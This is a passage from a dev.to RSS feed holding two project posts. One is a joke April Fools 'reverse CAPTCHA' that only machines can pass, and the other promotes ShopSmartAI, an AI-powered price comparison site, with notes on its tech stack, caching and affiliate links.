&lt;p&gt;We've all been tortured by CAPTCHAs asking us to identify traffic lights, crosswalks, and suspiciously blurry bicycles. So I thought... what if we flipped it? What if the CAPTCHA was designed to keep &lt;em&gt;humans&lt;/em&gt; OUT?&lt;/p&gt;

&lt;p&gt;Welcome to the world's first &lt;strong&gt;Completely Automated Public Test to tell Computers and Humans Apart&lt;/strong&gt; — but reversed. Only machines can pass. Humans get roasted.&lt;/p&gt;

&lt;p&gt;The app throws 5 randomly selected challenges at you from a pool of 8 impossible tasks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Computational Speed&lt;/strong&gt; — Multiply two 6-digit numbers in your head. In 5 seconds. No calculator.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Binary Literacy&lt;/strong&gt; — Read binary like it's your mother tongue. Because for robots, it literally is.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Precision Targeting&lt;/strong&gt; — Click on an exact pixel coordinate within 3px. Your shaky human hands don't stand a chance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input Velocity&lt;/strong&gt; — Type 80 random characters (including &lt;code&gt;@#$%^&amp;amp;*&lt;/code&gt;) in 5 seconds. Good luck, meatbag.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reaction Speed&lt;/strong&gt; — Click within 50ms of a color change. Average human reaction time? 250ms. Sad.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Chromatic Analysis&lt;/strong&gt; — See a color, type its exact hex code. &lt;code&gt;#A7C3E2&lt;/code&gt;? Looks blue to you? Too bad.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Number Theory&lt;/strong&gt; — Identify ALL prime numbers from a grid of 4-digit numbers. In 10 seconds.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Temporal Awareness&lt;/strong&gt; — Type the current Unix timestamp. To the second. Right now. Go.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Fail, and you get a snarky diagnosis like: &lt;em&gt;"Have you considered upgrading to a cybernetic implant?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The "Humans Passed" counter on the landing page? Permanently stuck at &lt;strong&gt;0&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://shopsmartai.github.io/captcha-for-robots-app/" rel="noopener noreferrer"&gt;https://shopsmartai.github.io/captcha-for-robots-app/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Try it. You WILL fail. (And if you somehow pass, we need to have a conversation about whether you're truly human.)&lt;/p&gt;

&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/captcha-for-robots-app" rel="noopener noreferrer"&gt;
        captcha-for-robots-app
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      A reverse CAPTCHA that only robots can pass. Built for DEV April Fools Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
&lt;/div&gt;


&lt;h2&gt;
  
  
  How I Built It
&lt;/h2&gt;

&lt;p&gt;Zero dependencies. Zero frameworks. Zero build tools. Just three files doing the heavy lifting:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;index.html&lt;/code&gt;&lt;/strong&gt; — Semantic markup with SVG robot mascot&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;styles.css&lt;/code&gt;&lt;/strong&gt; — Full cyberpunk aesthetic: scanline overlays, CSS grid backgrounds, glitch text animations, neon glow effects, and pulsing buttons. All pure CSS.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;script.js&lt;/code&gt;&lt;/strong&gt; — 8 challenge generators with Canvas API for pixel grids, Performance API for millisecond-accurate reaction timing, Web Crypto-grade randomization, and a timer system that turns red when you're about to fail (which is always)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The whole thing is ~500 lines of JS with no external calls. It runs entirely client-side. Even the fake "2,847,293 attempts today" counter ticks up in real-time to make it feel like thousands of humans are failing simultaneously alongside you.&lt;/p&gt;

&lt;p&gt;Fun details I'm proud of:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The pixel grid challenge has a nearly invisible crosshair at the target — just visible enough to taunt you&lt;/li&gt;
&lt;li&gt;Challenge order is shuffled each attempt so you can't memorize the sequence&lt;/li&gt;
&lt;li&gt;The robot SVG eyes blink and the antenna glows between cyan and green&lt;/li&gt;
&lt;li&gt;Share button copies a pre-written message of shame to your clipboard&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Prize Category
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Community Favorite&lt;/strong&gt; — Because nothing unites the internet like collective humiliation. Every human who tries this will fail, share their score, and challenge their friends to fail too. It's a universal experience: we're all equally inferior to machines. Together.&lt;/p&gt;

</description>
      <category>devchallenge</category>
      <category>418challenge</category>
      <category>showdev</category>
    </item>
    <item>
      <title>I Built an AI-Powered Price Comparison Tool That Searches 100+ Retailers Instantly</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Thu, 02 Apr 2026 18:17:17 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-an-ai-powered-price-comparison-tool-that-searches-100-retailers-instantly-4492</link>
      <guid>https://dev.to/rkondoju/i-built-an-ai-powered-price-comparison-tool-that-searches-100-retailers-instantly-4492</guid>
      <description>&lt;p&gt;Have you ever spent 30 minutes opening tabs across Amazon, Best Buy, Walmart, and eBay just to find the best price on a laptop? I did too — so I built a tool to do it in seconds.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is ShopSmartAI?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://shopsmartai.org" rel="noopener noreferrer"&gt;ShopSmartAI&lt;/a&gt; is an AI-powered price comparison platform that searches 100+ retailers in real-time and shows you the best deals — for both the US and Canada.&lt;/p&gt;

&lt;p&gt;You can search in plain English like &lt;strong&gt;"gaming laptop under $800 with RTX"&lt;/strong&gt; and the AI understands exactly what you're looking for.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Tech Stack
&lt;/h2&gt;

&lt;p&gt;Here's what powers it:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Frontend:&lt;/strong&gt; Next.js 14 (App Router) on Vercel&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Backend:&lt;/strong&gt; Node.js/Express on Railway&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Database:&lt;/strong&gt; PostgreSQL with AI response caching (7-day TTL)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI:&lt;/strong&gt; Gemini 2.5 Flash for natural language search and product spec generation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Search Data:&lt;/strong&gt; Google Shopping API via Serper.dev + Best Buy API&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Affiliate:&lt;/strong&gt; Amazon Associates, eBay Partner Network, and more&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Key Features
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;AI Natural Language Search&lt;/strong&gt;&lt;br&gt;
Instead of keyword matching, the AI interprets what you actually want. Search for "best noise cancelling headphones for flying" and it returns relevant results ranked by what matters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Side-by-Side Comparison&lt;/strong&gt;&lt;br&gt;
Add up to 4 products and get an AI-generated comparison with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Per-category winners (Display, Performance, Battery, etc.)&lt;/li&gt;
&lt;li&gt;AI-generated specs from real product data&lt;/li&gt;
&lt;li&gt;Price comparison across all available retailers&lt;/li&gt;
&lt;li&gt;An overall verdict on which product wins and why&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;US + Canada Auto-Detection&lt;/strong&gt;&lt;br&gt;
The site detects your location and shows prices in USD or CAD with the right retailers. Canadian users see Canadian stores and prices — no more converting currencies in your head.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Price Alerts (No Signup Required)&lt;/strong&gt;&lt;br&gt;
Want to know when a product drops to your target price? Just enter your email — no account needed. We check prices and email you when it drops.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AI-Powered Blog&lt;/strong&gt;&lt;br&gt;
An automated blog publishes deal roundups and product comparisons every few days, targeting real search queries people are looking for.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the AI Search Works
&lt;/h2&gt;

&lt;p&gt;When a user searches, here's what happens:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The AI parses the natural language query to extract intent, budget, and must-have features&lt;/li&gt;
&lt;li&gt;We search Google Shopping API with optimized queries&lt;/li&gt;
&lt;li&gt;Results are normalized across retailers (different sites format data differently)&lt;/li&gt;
&lt;li&gt;Products are ranked by relevance — actual products rank above accessories&lt;/li&gt;
&lt;li&gt;Affiliate links are applied automatically based on retailer and country&lt;/li&gt;
&lt;li&gt;Results are cached in PostgreSQL to reduce API costs&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The AI doesn't just match keywords — it understands that "gaming laptop under $800 with RTX" means you want a laptop (not a case), with an NVIDIA RTX GPU, priced below $800.&lt;/p&gt;

&lt;h2&gt;
  
  
  Challenges I Faced
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Canadian Data is Different&lt;/strong&gt;&lt;br&gt;
Google Shopping returns base64-encoded images for Canadian results instead of URLs. I almost filtered these out as "broken" before realizing they're perfectly valid data URIs that render fine.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Affiliate Link Complexity&lt;/strong&gt;&lt;br&gt;
Each retailer has a different affiliate URL format. Amazon uses &lt;code&gt;tag=&lt;/code&gt;, eBay needs 5 different parameters (&lt;code&gt;mkevt&lt;/code&gt;, &lt;code&gt;mkcid&lt;/code&gt;, &lt;code&gt;mkrid&lt;/code&gt;, &lt;code&gt;campid&lt;/code&gt;, &lt;code&gt;toolid&lt;/code&gt;), and some retailers don't have affiliate programs at all. Building a universal affiliate tag system that handles all of these was a fun challenge.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Keeping Costs Low&lt;/strong&gt;&lt;br&gt;
AI API calls add up fast. I implemented a 3-tier caching strategy:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In-memory cache (24-hour TTL) for instant hits&lt;/li&gt;
&lt;li&gt;PostgreSQL cache (7-day TTL) for persistent storage&lt;/li&gt;
&lt;li&gt;AI generation only when cache misses&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This cut our AI costs by ~90%.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Chrome extension (built, pending Web Store approval) — compare prices on any shopping site&lt;/li&gt;
&lt;li&gt;More retailer integrations (Dell, HP, B&amp;amp;H Photo)&lt;/li&gt;
&lt;li&gt;Price history tracking with charts&lt;/li&gt;
&lt;li&gt;Mobile app&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Try It Out
&lt;/h2&gt;

&lt;p&gt;Check it out at &lt;a href="https://shopsmartai.org" rel="noopener noreferrer"&gt;shopsmartai.org&lt;/a&gt; — search for any product and see how it works. I'd love feedback from the dev community.&lt;/p&gt;

&lt;p&gt;If you're interested in the technical details of any specific part (the AI search pipeline, the caching strategy, the affiliate system, or the Next.js architecture), let me know in the comments and I'll do a deep dive.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Built with Next.js, Node.js, PostgreSQL, and Gemini AI. Deployed on Vercel + Railway.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>nextjs</category>
      <category>ai</category>
      <category>showdev</category>
    </item>
  </channel>
</rss>
